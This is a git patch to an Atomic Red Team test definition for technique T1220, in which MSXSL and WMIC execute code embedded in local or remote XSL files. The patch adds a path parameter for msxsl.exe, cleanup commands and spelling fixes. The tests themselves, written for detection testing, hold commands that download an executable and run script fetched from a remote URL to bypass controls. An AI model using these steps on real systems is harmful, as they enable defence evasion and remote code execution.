From decc37d1dce19e4b5899a65ca52db005ffb4bda6 Mon Sep 17 00:00:00 2001
From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com>
Date: Fri, 29 Oct 2021 18:18:18 -0400
Subject: [PATCH] Fix for MSXSL dependency issues

Added:

Fixes for "MSXSL Bypass using remote files"
T1220/bin/ folder for default msxsl.exe filepath.
Input argument for filepath to msxls.exe
Cleanup command to remove msxls.exe
Capitalization fixes for "-ErrorAction Ignore"
Fixed spelling "successfully" on line 10, 60, and 121.
Split line 57 to get length under 150 characters.
---
 atomics/T1220/T1220.yaml | 46 +++++++++++++++++++++++++++++-----------
 1 file changed, 34 insertions(+), 12 deletions(-)

diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml
index 03936bd3..1656a3a4 100644
--- a/atomics/T1220/T1220.yaml
+++ b/atomics/T1220/T1220.yaml
@@ -5,8 +5,9 @@ atomic_tests:
   auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d
   description: |
     Executes the code specified within a XSL script tag during XSL transformation using a local payload. 
-    Requires download of MSXSL from Microsoft (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ). 
-    Open Calculator.exe when test sucessfully executed, while AV turned off.
+    Requires download of MSXSL. No longer available from Microsoft.
+    (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) 
+    Open Calculator.exe when test successfully executed, while AV turned off.
   supported_platforms:
   - windows
   input_arguments:
@@ -18,6 +19,10 @@ atomic_tests:
       description: Location of the test XSL script file on the local filesystem.
       type: Path
       default: PathToAtomicsFolder\T1220\src\msxslscript.xsl
+    msxsl_exe:
+      description: Location of the MSXSL executable.
+      type: Path
+      default: PathToAtomicsFolder\T1220\bin\msxsl.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -25,31 +30,34 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{xmlfile}) {exit 0} else {exit 1}
     get_prereq_command: |
-      New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null
+      New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null
       Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
   - description: |
       XSL file must exist on disk at specified location (#{xslfile})
     prereq_command: |
       if (Test-Path #{xslfile}) {exit 0} else {exit 1}
     get_prereq_command: |
-      New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null
+      New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null
       Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
   - description: |
       msxsl.exe must exist on disk at specified location (#{msxsl_exe})
     prereq_command: |
       if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "$env:TEMP\msxsl.exe"
-      Copy-Item $env:TEMP\msxsl.exe #{msxsl_exe} -Force
-      Remove-Item $env:TEMP\msxsl.exe
+      Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
   executor:
     command: |
-      C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
+      #{msxsl_exe} #{xmlfile} #{xslfile}
+    cleanup_command: | 
+      Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
     name: command_prompt
 - name: MSXSL Bypass using remote files
   auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
   description: |
-    Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
+    Executes the code specified within a XSL script tag during XSL transformation using a remote payload.
+    Requires download of MSXSL.exe. No longer available from Microsoft.
+    (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
+    Open Calculator.exe when test successfully executed, while AV turned off.
   supported_platforms:
   - windows
   input_arguments:
@@ -61,9 +69,23 @@ atomic_tests:
       description: Remote location (URL) of the test XSL script file.
       type: Url
       default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
+    msxsl_exe:
+      description: Location of the MSXSL executable.
+      type: Path
+      default: PathToAtomicsFolder\T1220\bin\msxsl.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      msxsl.exe must exist on disk at specified location (#{msxsl_exe})
+    prereq_command: |
+      if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
   executor:
     command: |
-      C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
+      #{msxsl_exe} #{xmlfile} #{xslfile}
+    cleanup_command: | 
+      Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
     name: command_prompt
 - name: WMIC bypass using local XSL file
   auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
@@ -87,7 +109,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}
     get_prereq_command: |
-      New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null
+      New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null
       Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
   executor:
     command: |
@@ -96,7 +118,7 @@ atomic_tests:
 - name: WMIC bypass using remote XSL file
   auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b
   description: |
-    Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off.
+    Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off.
   supported_platforms:
   - windows
   input_arguments: